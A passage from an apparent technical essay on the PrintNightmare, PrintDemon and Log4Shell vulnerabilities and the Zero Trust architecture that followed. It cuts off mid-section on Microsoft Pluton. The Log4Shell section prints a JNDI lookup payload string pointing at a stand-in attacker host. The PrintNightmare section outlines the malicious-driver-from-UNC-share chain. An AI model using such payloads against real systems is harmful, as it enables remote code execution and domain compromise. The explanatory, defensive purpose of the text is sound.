&lt;p&gt;On Patch Tuesday, June 8, 2021, Microsoft shipped a fix for CVE-2021-1675 [@msrc-cve-2021-1675] and labelled the vulnerability as an Elevation of Privilege in the Windows Print Spooler. Two weeks later -- with no announcement, no out-of-band advisory, and no community notification -- the MSRC entry was edited to add Remote Code Execution to the impact classification. Sangfor&apos;s Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370) had reported the EoP behavior [@cube0x0-cve-2021-1675-gh]; the silent reclassification suggested an RCE primitive existed in the same surface that the June 8 patch had not closed. On June 29, believing the chain was now patched, Sangfor pushed a proof-of-concept to GitHub [@cube0x0-cve-2021-1675-gh, @cert-cc-vu-383432]. The repository was taken down within hours; copies preserved in forks (notably @cube0x0&apos;s Impacket port) became the artifact-of-record.&lt;/p&gt;
&lt;p&gt;CERT/CC&apos;s Will Dormann reproduced the chain the next day and published Vulnerability Note VU#383432 with a sentence that the Windows operations community spent the rest of the week re-reading [@cert-cc-vu-383432]:&lt;/p&gt;

While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does NOT protect against public exploits that may refer to PrintNightmare or CVE-2021-1675. -- Will Dormann, CERT/CC VU#383432, June 30, 2021
&lt;p&gt;On July 1, Microsoft assigned a new CVE -- CVE-2021-34527 -- for the broader RCE surface and acknowledged that it was &quot;similar but distinct&quot; from CVE-2021-1675 [@msrc-cve-2021-34527]. Out-of-band patches followed on July 6-7 for every supported Windows release, including unusual coverage for Windows 7 and Server 2008. On July 13, CISA issued Emergency Directive 21-04 ordering federal civilian agencies to apply the patches immediately and to disable or restrict the Print Spooler on Domain Controllers as a standing mitigation [@cisa-ed-21-04]. Microsoft followed with KB5005010 on July 14, documenting the supplementary Point-and-Print hardening required to close the residual surface [@kb5005010].&lt;/p&gt;
&lt;p&gt;The Sangfor commit was preserved in forks because GitHub&apos;s fork model maintains each fork as an independent copy of the upstream repository&apos;s commit object graph, retained regardless of subsequent upstream deletion [@github-docs-about-forks]. The @cube0x0 fork [@cube0x0-cve-2021-1675-gh] became the de facto preserved artifact-of-record, with Sangfor&apos;s original authorship credited in the README. The story is a study in the asymmetry of disclosure timing: a vendor can take down a repository, but cannot retract the bytes that have already left.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PrintNightmare had a prior.&lt;/strong&gt; Thirteen months earlier, on May 12, 2020, Alex Ionescu and Yarden Shafir published &quot;PrintDemon&quot; against the same service, the same SYSTEM context, and the same fundamental design assumption that PrintNightmare would expose more deeply [@printdemon-windows-internals]. PrintDemon (CVE-2020-1048) exploited the Spooler&apos;s printer-port abstraction: a printer port name was an opaque string the Spooler treated as a destination, and an unprivileged user could set the port name to an arbitrary file path. The Spooler would then write the print job bytes to that path -- with SYSTEM privileges -- producing arbitrary file write as SYSTEM through three PowerShell one-liners (&lt;code&gt;Add-Printer&lt;/code&gt;, set port, &lt;code&gt;Out-Printer&lt;/code&gt;) that any standard user could run. SafeBreach Labs&apos; Peleg Hadar and Tomer Bar independently reported the same surface, reverse-engineered the May Microsoft patch, and presented related Spooler work at Black Hat USA 2020 [@cyberscoop-safebreach-spooler].&lt;/p&gt;
&lt;p&gt;The design flaw is the same in both cases: the Spooler&apos;s RPC interface trusts caller-supplied strings (port names in PrintDemon; driver-package paths in PrintNightmare) without enforcing caller-side permissions on the file paths they resolve to. PrintDemon&apos;s primitive was arbitrary &lt;em&gt;file write&lt;/em&gt; as SYSTEM. PrintNightmare&apos;s primitive was arbitrary &lt;em&gt;code execution&lt;/em&gt; as SYSTEM via DLL load. The May 2020 to June-July 2021 progression is the canonical &quot;expand the primitive&quot; vulnerability-research arc -- same service, same trust assumption, incrementally more dangerous primitive.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;PrintDemon (CVE-2020-1048)&lt;/th&gt;
&lt;th&gt;PrintNightmare (CVE-2021-1675 / CVE-2021-34527)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Disclosure&lt;/td&gt;
&lt;td&gt;May 12, 2020 Patch Tuesday&lt;/td&gt;
&lt;td&gt;June 8 (EoP), July 1 (RCE), July 6-7 OOB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Researchers&lt;/td&gt;
&lt;td&gt;Ionescu, Shafir; SafeBreach Hadar, Bar&lt;/td&gt;
&lt;td&gt;Sangfor Peng, Li; CERT/CC Dormann; @cube0x0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vulnerable RPC primitive&lt;/td&gt;
&lt;td&gt;Printer-port name accepts arbitrary path&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; loads driver from UNC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primitive class&lt;/td&gt;
&lt;td&gt;Arbitrary file write as SYSTEM&lt;/td&gt;
&lt;td&gt;Arbitrary code execution as SYSTEM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Caller privilege required&lt;/td&gt;
&lt;td&gt;Standard local user&lt;/td&gt;
&lt;td&gt;Authenticated domain user&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Domain Controller impact&lt;/td&gt;
&lt;td&gt;Local file-write only&lt;/td&gt;
&lt;td&gt;Remote SYSTEM RCE on every DC running Spooler&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Disclosure model&lt;/td&gt;
&lt;td&gt;Coordinated, Patch Tuesday&lt;/td&gt;
&lt;td&gt;Coordinated, then accidental PoC, then OOB&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;PrintNightmare is the wider case of an attack-class PrintDemon had already opened. The architectural lesson is that a vulnerability researcher who finds &lt;em&gt;any&lt;/em&gt; primitive in a SYSTEM-privileged Windows RPC service should be treated as a signal that the broader surface needs review, not as a point-fix candidate.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The exploit chain.&lt;/strong&gt; The Windows Print Spooler service (&lt;code&gt;spoolsv.exe&lt;/code&gt;) runs as SYSTEM on every Windows machine and is enabled by default, including on Domain Controllers. The Spooler exposes two Remote Procedure Call interfaces (MS-RPRN and MS-PAR) used by clients to query printers, submit jobs, and install drivers. &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; is the RPC method that installs a new printer driver. As shipped before July 2021, the method accepted a driver path specified as a UNC, fetched the driver file from that path, and loaded it into the Spooler process -- which runs as SYSTEM. An authenticated domain user could call &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; against any reachable Spooler with the driver path pointing to an attacker-controlled share, and obtain SYSTEM execution in the target Spooler process. Domain Controllers running Spooler by default meant any authenticated domain user obtained SYSTEM on every DC. Domain compromise followed.&lt;/p&gt;

The MS-RPRN Print System Remote Protocol is the canonical Windows RPC interface for printer management. Per the Microsoft Open Specifications Appendix B Product Behavior, the earliest applicable Windows version is Windows NT 3.1 (1993). It exposes interfaces for printer enumeration, job management, and driver installation. Because Spooler hosts the interface and runs as SYSTEM, every reachable Spooler is a potential SYSTEM-level RPC endpoint. PrintNightmare exploited the `RpcAddPrinterDriverEx` method specifically; the related `RpcAsyncAddPrinterDriver` method is the asynchronous variant Dormann documented as the alternative entry point.

flowchart LR
    A[Domain user with credentials] --&amp;gt; B[RpcAddPrinterDriverEx call]
    B --&amp;gt; C[Print Spooler on Domain Controller]
    C --&amp;gt; D[Spooler fetches driver from UNC path]
    D --&amp;gt; E[Attacker SMB share with malicious DLL]
    E --&amp;gt; C
    C --&amp;gt; F[DLL loaded into spoolsv.exe as SYSTEM]
    F --&amp;gt; G[SYSTEM execution on Domain Controller]
    G --&amp;gt; H[Domain compromise]

PrintNightmare turned on a vendor practice that the disclosure community had not previously named as a primitive: a security advisory whose classification changed without notice. The June 8 publication of CVE-2021-1675 said EoP. The mid-June revision said EoP and RCE. There was no out-of-band advisory, no email to affected administrators, no public callout. The reclassification was visible only to people who happened to revisit the MSRC page.&lt;p&gt;Sangfor&apos;s accidental PoC was, in a real sense, an artifact of the reclassification. The researchers believed the patched June 8 chain was the same chain they had reported and that the published patch covered their proof-of-concept. The change-without-notice meant the patch they were testing was incomplete and the demonstration they were publishing was live. The CERT/CC follow-up demonstrated the same point from the verifier side: a reproducer ran against a fully patched Windows Server 2019 Domain Controller and got SYSTEM.&lt;/p&gt;
&lt;p&gt;The post-PrintNightmare disclosure-norms debate spent the next two years working through the implications. Should reclassifications trigger a fresh CVE assignment so the change has its own visible identifier? Should advisories carry change logs analogous to those on RFCs? Should vendors notify researchers credited for one CVE when the classification is broadened? MSRC&apos;s current practice has moved toward more transparent change tracking; the 2021 silent reclassification remains the canonical counterexample.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The architectural lesson is that the Windows attack surface still includes services dating from Windows NT 3.1, designed for a single-domain office LAN, running with SYSTEM-equivalent privileges on every Domain Controller by default. A silent vendor reclassification from EoP to RCE is itself an adversarial signal -- it is what leaks the technique.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The defensible architecture for legacy Windows RPC surfaces is to constrain who can reach them and what privileges the host process holds when they are reached. Disabling Print Spooler on Domain Controllers (per CISA ED 21-04 [@cisa-ed-21-04]) and enabling the Point-and-Print restrictions in KB5005010 [@kb5005010] are the immediate hardening; the long-arc architectural answer is the same one that closes the ProxyLogon class, namely treating any service exposing RPC at SYSTEM as an internet-facing surface even when the network topology says otherwise.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the supply-chain class compromised the signature and the on-premises server class compromised the perimeter, PrintNightmare compromised the &lt;em&gt;inside&lt;/em&gt; of the trust boundary -- the Domain Controller itself. The fourth incident showed that even the boundary of the application stack was not a boundary.&lt;/p&gt;
&lt;h3&gt;3.4 Log4Shell: The Universal Library and the Transitive Dependency Graph&lt;/h3&gt;
&lt;p&gt;On November 24, 2021, Chen Zhaojun of Alibaba Cloud Security emailed the Apache Software Foundation with a vulnerability in Log4j 2.x: any message that the application logged, if it contained a &lt;code&gt;${jndi:...}&lt;/code&gt; substitution sequence, would trigger an outbound JNDI lookup [@log4j-apache-security]. On December 9, the bug surfaced in Minecraft Java Edition community channels -- which mattered because Minecraft&apos;s chat handler logs the messages players send. Within hours, LunaSec&apos;s Free Wortley and Chris Thompson published the canonical writeup and coined the name &quot;Log4Shell&quot; [@lunasec-log4shell-gh]. Apache shipped Log4j 2.15.0 on December 10. CVE-2021-44228 was scored CVSS 10.0 [@nvd-cve-2021-44228]. On December 11, CISA Director Jen Easterly&apos;s official statement called Log4Shell a &quot;severe risk&quot; and &quot;an urgent challenge to network defenders&quot; [@cisa-easterly-statement-2021-12-11]. Two days later, on the CISA-convened national industry call, she went further: &quot;one of the most serious I&apos;ve seen in my entire career, if not the most serious&quot; [@cyberscoop-easterly-2021-12-13].&lt;/p&gt;

CVE-2021-44228 was the moment &quot;what versions of what library are in my fleet&quot; stopped being a procurement question and became a federal-advisory question. -- Synthesis from CISA AA21-356A and the Apache Log4j security history
&lt;p&gt;&lt;strong&gt;Why a Java library belongs in a Windows series.&lt;/strong&gt; Log4Shell is not a Windows vulnerability. The bug is in Apache Log4j, a Java logging library, and the impact lands on any process that runs the affected Log4j versions and logs untrusted input. It belongs in this series because the most enterprise-impactful exploitation in the Windows-server-fleet population ran through Java applications hosted on Windows: Tomcat and JBoss application servers, VMware vCenter and Horizon, Atlassian Confluence and Jamf Pro on Windows hosts, Cisco enterprise products, ElasticSearch, and dozens of internal Java services running on Windows Server with embedded JREs. Microsoft&apos;s December 11, 2021 Security Blog post (with rolling updates through January 2022) documented Log4Shell exploitation against Windows-hosted Java fleets and the Defender for Endpoint detections built on top [@ms-log4j-guidance]; CISA&apos;s joint advisory covered the cross-platform exposure explicitly [@cisa-aa21-356a].&lt;/p&gt;

A Java API, first standardized in 1999, that provides a uniform interface for naming and directory services. JNDI is the abstraction layer between Java application code and back-end directory implementations -- LDAP, RMI, DNS, CORBA, and others. The Log4j 2.x message-pattern substitution feature evaluated `${jndi:...}` lookups by calling JNDI to resolve the named resource. If the JNDI URL pointed at an attacker-controlled LDAP server, the attacker could return a Java class reference, which the JVM would then download and instantiate -- executing arbitrary code in the application process.
&lt;p&gt;&lt;strong&gt;The exploit chain.&lt;/strong&gt; Any logged string that contained a &lt;code&gt;${jndi:ldap://attacker.example/payload}&lt;/code&gt; substitution caused Log4j to call out to the attacker&apos;s LDAP server. The server returned a Java class reference; the JVM dereferenced it, loaded the class over HTTP, and instantiated it. Arbitrary code execution followed under the JVM&apos;s identity. The exploitation primitive was extraordinarily compact: any place an attacker could get an attacker-controlled string into a logged event -- HTTP User-Agent, X-Forwarded-For, Minecraft chat, application form fields, log-event JSON, the username field of a failed authentication -- was an entry point.&lt;/p&gt;

sequenceDiagram
    participant Att as Attacker
    participant App as Java application on Windows
    participant Log4j as Log4j 2.x logger
    participant LDAP as Attacker LDAP server
    Att-&amp;gt;&amp;gt;App: HTTP request, header contains JNDI lookup string
    App-&amp;gt;&amp;gt;Log4j: logger.info incoming-request line
    Log4j-&amp;gt;&amp;gt;Log4j: Message-pattern substitution evaluates the lookup
    Log4j-&amp;gt;&amp;gt;LDAP: JNDI LDAP query to attacker host
    LDAP-&amp;gt;&amp;gt;Log4j: Reference to attacker-hosted Java class
    Log4j-&amp;gt;&amp;gt;LDAP: HTTP fetch of the class file
    LDAP-&amp;gt;&amp;gt;Log4j: Bytecode payload
    Log4j-&amp;gt;&amp;gt;App: JVM instantiates the class, runs constructor as the JVM identity
    Note over App: SYSTEM-level RCE on Windows hosts where the JVM ran as SYSTEM
&lt;p&gt;The Minecraft Java Edition leak vector mattered both for impact and for visibility. Java Edition&apos;s chat handler logs the messages players send. A player who typed a JNDI lookup into chat could trigger remote code execution on any server -- including the player&apos;s own Minecraft client -- that processed the chat through Log4j. The fastest public confirmation of the bug came not from a security researcher but from screenshots of Minecraft chat sessions, and the discovery propagated through the gaming community before the security industry had its first advisory out.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Blast radius.&lt;/strong&gt; CVSS 10.0 is the maximum score the framework allows. At the same December 13 industry call, officials placed Log4Shell as affecting &quot;hundreds of millions of devices&quot; [@cyberscoop-easterly-2021-12-13]; the formal eight-agency joint advisory AA21-356A followed on December 22 [@cisa-aa21-356a]. The number was never an audited count; it was an order-of-magnitude estimate that combined Java&apos;s installed base (the JDK shipping by the time of disclosure was on every major enterprise platform) with Log4j&apos;s adoption across the Java community (Log4j 2 is a transitive dependency of thousands of enterprise packages, often pulled in by chained dependency graphs that the application owner never explicitly chose). What the figure communicated -- accurately -- was that &lt;em&gt;no one knew&lt;/em&gt; how many Log4j 2 instances existed in production.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Patch cascade.&lt;/strong&gt; Log4j 2.15.0 (December 10) closed CVE-2021-44228 but did not fully eliminate the JNDI lookup primitive. 2.16.0 (December 13) closed CVE-2021-45046 by removing message lookups entirely. 2.17.0 (December 17) closed CVE-2021-45105, a denial-of-service in the same substitution path. 2.17.1 (December 28) closed CVE-2021-44832, an arbitrary-code-execution variant. The architectural lesson includes the &quot;first patch did not actually fix it&quot; story -- four CVEs and four patch releases over nineteen days to fully close a single bug class. Backports to the older 2.3.x and 2.12.x branches continued into January 2022.&lt;/p&gt;

A formal, machine-readable inventory of the components -- libraries, packages, embedded code, and dependencies -- that make up a software artifact. The two dominant standards are CycloneDX (OWASP, ECMA-424) [@cyclonedx-home] and SPDX (Linux Foundation, ISO/IEC 5962:2021) [@spdx-home]. EO 14028 made SBOM provision a federal procurement requirement [@eo-14028]; the SBOM debate the four incidents accelerated is whether SBOM data is most useful as a *prevention* tool (refusing to install software whose components fail policy) or as an *incident response* tool (answering &quot;are we exposed?&quot; in hours rather than weeks). Log4Shell was the first incident where the IR utility was operationally tested at scale.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Universal libraries with deep transitive-dependency footprints are the new universal attack surface. &quot;What versions of what library are in my fleet&quot; was a question the typical enterprise could not answer in December 2021, and that gap is what accelerated SBOM from a policy document to operational tooling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Four incidents in thirteen months. Four assumptions broken. The next section asks what the prior-decade controls were actually doing that whole time.&lt;/p&gt;
&lt;h2&gt;4. Why Prior Art Did Not Catch Any of the Four&lt;/h2&gt;
&lt;p&gt;If the prior decade had quietly elevated four assumptions to invariants, the prior-decade controls had been quietly enforcing them. Here is what each one was actually doing during 2020-2021.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Endpoint EDR alone.&lt;/strong&gt; The 2018-2020 industry consensus was that endpoint detection and response, plus a SIEM, plus a security operations centre, plus periodic threat hunting, constituted tractable defense-in-depth. The model worked against malware. It did not work against SUNBURST, because the binary that executed was the one EDR was specified to trust: signed by SolarWinds, on the approved publisher list, distributed via the customer&apos;s own patch-management pipeline. It did not work against ProxyLogon either, because the entry was an unauthenticated HTTPS request to a publicly reachable Exchange front-end, and the resulting web shell was an ASPX file served by &lt;code&gt;w3wp.exe&lt;/code&gt; (the IIS worker process) -- not a malware drop. By the time EDR had behavioral telemetry on either case, the post-compromise phase was several steps along. Microsoft&apos;s own Digital Defense Report acknowledged the posture in plainer language: the industry had become competent at &lt;em&gt;finding&lt;/em&gt; attackers after the fact, not at stopping them at first execution [@mddr-2021-specific].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Perimeter VPN and Network Access Control.&lt;/strong&gt; The defense-in-depth posture of the 2010s assumed the inside of the corporate network was a higher-trust zone than the outside, accessed via a VPN concentrator on the boundary. BeyondCorp&apos;s 2014-2017 publication sequence had already named the assumption as architecturally wrong: the December 2014 Ward and Beyer paper [@ward-beyer-2014-usenix], the Spring 2016 Osborn et al. design-to-deployment paper [@beyondcorp-osborn-2016], the Winter 2016 Cittadini et al. access-proxy paper [@beyondcorp-cittadini-2016], the Summer 2017 Peck et al. migration paper [@beyondcorp-peck-2017], and the Fall 2017 Escobedo et al. user-experience paper [@beyondcorp-escobedo-2017] together document Google&apos;s transition off the privileged-intranet assumption and onto the public internet. SolarWinds did the empirical version of the same argument. The attacker was &lt;em&gt;already inside&lt;/em&gt; the privileged-intranet zone, by virtue of a trusted vendor&apos;s signed update being a legitimate inhabitant of that zone. Anything the perimeter VPN was enforcing was being enforced against a population that did not include the attacker.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Patch Tuesday as the universal cadence.&lt;/strong&gt; Microsoft&apos;s Patch Tuesday cadence -- the second Tuesday of every month, published at 10 AM Pacific Time -- was the assumed coordination point for the entire Windows defense industry [@ms-release-cycle]. Detection engineering, change management, scheduled-maintenance windows, and operator workflow all keyed on that monthly rhythm. Between March and August 2021, Microsoft issued multiple out-of-band emergency Exchange and Windows updates [@msft-hafnium-blog, @kb5005010]. The cadence&apos;s predictability -- the very property that scaled it to a global operator base -- was the property that made out-of-band patches feel like emergencies. The cadence broke under load not because the model was wrong but because the model assumed the load would not arrive in a sustained burst.&lt;/p&gt;
&lt;p&gt;The clustering of out-of-band patches matters as a measured cadence-failure signal. Patch Tuesday absorbs routine load; it does not absorb a clustering of pre-auth RCEs in Exchange Server and Print Spooler within four months. The 2021 cluster was a stress test on the cadence itself, and one of the post-incident operator complaints (from administrators of Domain Controllers required to reboot for the July 6-7 PrintNightmare OOB) was that the cadence&apos;s monthly rhythm had been training operations teams for a different threat model than the one 2021 produced.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; All three prior-art positions -- endpoint EDR, perimeter VPN, monthly patch cadence -- assumed the trust boundary was knowable. EDR knew which binaries were trusted (the signed ones). The VPN knew where the boundary was (between the corporate LAN and the public internet). Patch Tuesday knew when updates would arrive (the second Tuesday of every month). The 2020-2023 cluster proved each boundary was something other than where the prior decade had placed it. The pivot was already on the shelf; it had just not yet become operative.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;5. Zero Trust Was Already on the Shelf&lt;/h2&gt;
&lt;p&gt;There is a startling chronology fact here. NIST Special Publication 800-207, &lt;em&gt;Zero Trust Architecture&lt;/em&gt; [@nist-sp-800-207], was published in August 2020. The Mandiant SUNBURST disclosure was December 13, 2020. Zero Trust was not a response to SolarWinds. It was the vocabulary already on the shelf when SolarWinds needed it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The intellectual chain.&lt;/strong&gt; Zero Trust is not a single document but a tradition with a thirteen-year arc. Four named milestones structure that arc.&lt;/p&gt;
&lt;p&gt;In September 2010, John Kindervag, then at Forrester Research, published &quot;No More Chewy Centers: Introducing the Zero Trust Model of Information Security&quot; [@kindervag-2010-forrester, @isc2-15-years-zt, @illumio-15-years-zt]. The framing was network-segmentation-first and rhetorically unforgettable:&lt;/p&gt;

&quot;Information security professionals must eliminate the soft chewy center by making security ubiquitous throughout the network, not just at the perimeter.&quot; -- John Kindervag, Forrester Research, &quot;No More Chewy Centers,&quot; September 14, 2010
&lt;p&gt;In December 2014, Rory Ward and Betsy Beyer of Google published &quot;BeyondCorp: A New Approach to Enterprise Security&quot; in USENIX &lt;code&gt;;login:&lt;/code&gt; magazine [@ward-beyer-2014-usenix]. The paper documented Google&apos;s transition from a privileged-intranet model to one in which every internal application was reachable on the public internet and every access decision was made on the basis of authenticated user and managed-device identity. A series of further BeyondCorp papers through 2017 worked out the engineering details. BeyondCorp is a &lt;em&gt;production implementation&lt;/em&gt; of Zero Trust principles; it is not &quot;the framework,&quot; and Ward and Beyer do not claim it is.&lt;/p&gt;
&lt;p&gt;Between 2017 and 2018, Forrester elaborated the original framing into Zero Trust eXtended (ZTX), a seven-pillar taxonomy, and Gartner introduced CARTA -- Continuous Adaptive Risk and Trust Assessment -- as a complementary continuous-evaluation framing.ZTX gave the framework a procurement-friendly seven-pillar map; CARTA reframed access decisions as continuous rather than session-initial. Neither produced a complete architectural specification, which is the gap NIST SP 800-207 was published to fill in August 2020.&lt;/p&gt;
&lt;p&gt;In August 2020, NIST published SP 800-207 [@nist-sp-800-207]. Authored by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly, SP 800-207 synthesized Kindervag&apos;s framing, BeyondCorp&apos;s worked example, ZTX&apos;s taxonomy, CARTA&apos;s continuous evaluation, and federal Trusted Internet Connections (TIC) guidance into a vendor-neutral architecture. The architectural primitives the document names -- Policy Decision Point, Policy Enforcement Point, Policy Engine, and Policy Administrator -- become the load-bearing vocabulary for every subsequent Zero Trust treatment.&lt;/p&gt;

An architectural orientation that refuses the assumption of a privileged inside network and decides every access on the basis of authenticated identity, device posture, and contextual signals at the moment of access. The term was coined by John Kindervag at Forrester in September 2010 [@kindervag-2010-forrester]. BeyondCorp [@ward-beyer-2014-usenix] is Google&apos;s production implementation, not the framework. NIST SP 800-207 [@nist-sp-800-207] is the vendor-neutral architectural specification. The Microsoft three-principle formulation (&quot;Verify Explicitly, Use Least Privilege, Assume Breach&quot; [@ms-zt-overview]) is *one* specialization of an older tradition; it is not the original.

The two load-bearing primitives in NIST SP 800-207&apos;s Zero Trust architecture [@nist-sp-800-207]. The Policy Decision Point is the component that evaluates an access request against policy, user identity, device posture, and contextual signals and produces a decision. The Policy Enforcement Point is the component that intercepts the request and enforces the decision the PDP returns. In Microsoft&apos;s stack, Conditional Access [@ms-conditional-access] is the PDP for cloud-application access decisions; the resource (Exchange Online, SharePoint, a custom app) is the PEP. The PDP and PEP can be co-located or remote; the architectural distinction is the one that matters.

A common simplification reads NIST SP 800-207 as having &quot;formalized BeyondCorp.&quot; This is the wrong shape of the chain.&lt;p&gt;NIST SP 800-207 explicitly references BeyondCorp as one production implementation of Zero Trust principles, alongside other implementations and prior architectural work. The document does not claim to be a formalization of BeyondCorp; it claims to be a vendor-neutral synthesis of multiple traditions, of which BeyondCorp is the most-cited production exemplar. The naming sequence -- &quot;Zero Trust&quot; 2010 by Kindervag, &quot;BeyondCorp&quot; 2014 by Ward and Beyer, &quot;Zero Trust Architecture&quot; 2020 by Rose et al. -- preserves the distinction.&lt;/p&gt;
&lt;p&gt;The reason this matters is that &quot;BeyondCorp&quot; as a brand has become shorthand inside the Google-aligned engineering community for &quot;the Zero Trust thing,&quot; while in the federal procurement community the relevant artifact is SP 800-207 itself. When the OMB M-22-09 federal Zero Trust strategy memo [@omb-m-22-09] cites a canonical reference, it cites SP 800-207, not BeyondCorp. The Microsoft three-principle formulation cites SP 800-207. CISA&apos;s Zero Trust Maturity Model cites SP 800-207. BeyondCorp is the worked example; SP 800-207 is the contract.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

flowchart LR
    A[Kindervag Forrester 2010, No More Chewy Centers] --&amp;gt; B[Google BeyondCorp 2014 to 2017, USENIX login]
    B --&amp;gt; C[Forrester ZTX 2017 to 2018]
    A --&amp;gt; C
    A --&amp;gt; D[Gartner CARTA 2017 to 2018]
    C --&amp;gt; E[NIST SP 800-207 August 2020]
    D --&amp;gt; E
    B --&amp;gt; E
    E --&amp;gt; F[Microsoft three-principle 2021 to 2022]
    E --&amp;gt; G[EO 14028 May 2021 and OMB M-22-09 January 2022]
    G --&amp;gt; H[CISA ZTMM v2.0 April 2023]
    E --&amp;gt; H
&lt;p&gt;The Microsoft three-principle adoption -- Verify Explicitly, Use Least Privilege, Assume Breach -- runs through Microsoft Build 2022&apos;s Zero Trust keynote programming and through the Microsoft Learn Zero Trust overview that codifies the framing as Microsoft documentation [@ms-zt-overview]. Federal adoption became binding in OMB M-22-09 on January 26, 2022 [@omb-m-22-09], which required Federal Civilian Executive Branch agencies to align with SP 800-207 and the CISA Zero Trust Maturity Model by end of FY24, with phishing-resistant multi-factor authentication as the identity-pillar baseline.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Zero Trust is not a 2020 invention, and the SolarWinds-HAFNIUM-PrintNightmare-Log4Shell clustering is not what &lt;em&gt;created&lt;/em&gt; the architecture. The vocabulary was already on the shelf in August 2020. The thirteen-month incident clustering is what made the vocabulary operative for the Windows industry -- because the incident clustering invalidated four separate assumptions simultaneously, and only an architectural pivot at the perimeter-trust level addressed all four.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The vocabulary existed in August 2020. The receipt arrived in December 2020. Section 6 walks the four Windows-side primitives that operationalized the vocabulary at scale.&lt;/p&gt;
&lt;h2&gt;6. The Defensive Layer That Shipped at Scale (2021-2023)&lt;/h2&gt;
&lt;p&gt;Vocabulary becomes architecture only when something ships. Here are the four Windows-side primitives that operationalized Zero Trust between 2021 and 2023.&lt;/p&gt;
&lt;h3&gt;6.1 Microsoft Pluton: The Hardware Response to a Supply-Chain Class&lt;/h3&gt;
&lt;p&gt;On November 17, 2020 -- three weeks before Mandiant&apos;s SUNBURST disclosure -- David Weston announced the &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Microsoft Pluton security processor&lt;/a&gt; [@weston-2020-pluton]. The announcement named the architectural goal directly. Discrete &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;Trusted Platform Modules&lt;/a&gt; sit on the LPC or SPI bus that runs between the CPU package and the motherboard chipset; the bus is observable with a logic analyzer. The 2019 Pulse Security research by Denis Andzakovic [@pulse-tpm-sniffing], the 2021 SCRT reproduction [@scrt-tpm-sniffing], and Henri Nurmi&apos;s 2022 WithSecure Labs SPI follow-up [@withsecure-tpm-sniffing] had all demonstrated that the &lt;a href=&quot;https://paragmali.com/blog/bitlocker-on-windows-architecture-attacks-and-the-limits-of-/&quot; rel=&quot;noopener&quot;&gt;BitLocker Volume Master Key&lt;/a&gt; transiting that bus was extractable with a forty-dollar FPGA. Pluton&apos;s architectural answer was to eliminate the bus. Place the security processor &lt;em&gt;inside&lt;/em&gt; the CPU package, and the BitLocker key never traverses an externally observable trace.&lt;/p&gt;
&lt;p&gt;Pluton is not a 2020 design. The same Microsoft Security and Pluton team shipped its first production silicon on the Xbox One in 2013, where the security processor was the anti-piracy and DRM key-storage root of trust. Galen Hunt&apos;s team then shipped a Pluton-derived security subsystem on Azure Sphere MCUs from April 2018, where it served as the secure-boot, runtime-attestation, and Microsoft-managed-firmware-update root for the IoT-microcontroller class [@azure-sphere-2018-azure-mirror]. The November 2020 announcement [@weston-2020-pluton] was the commitment to ship a mature security-processor design on general-purpose Windows PCs, not a new design.&lt;/p&gt;

A security processor co-designed by Microsoft, AMD, Intel, and Qualcomm, announced in November 2020 [@weston-2020-pluton] and shipped commercially in May 2022 on Lenovo ThinkPad Z13 and Z16 systems with AMD Ryzen 6000 SoCs -- the Lenovo StoryHub press release confirms the ship vehicle (&quot;ThinkPad Z13 will be available from May 2022, starting from $1549&quot; and &quot;ThinkPad Z16 will be available from May 2022, starting from $2099&quot;), and David Weston&apos;s CES 2022 Microsoft Windows Experience Blog post the same day names the same Pluton-on-Ryzen-6000 ThinkPad Z ship vehicle [@lenovo-thinkpad-z-press-jan2022, @pluton-windows-blog-jan2022]. Pluton can operate in three modes: as a TPM 2.0 implementation co-resident on the CPU die (the default on consumer Windows 11 systems where Pluton is enabled), as a security processor alongside a separate discrete TPM, or disabled at the OEM level [@ms-pluton-learn]. The architectural goal is to close the TPM bus-sniffing class by eliminating the external bus, not to add new cryptographic capability beyond what TPM 2.0 already specifies.

flowchart TD
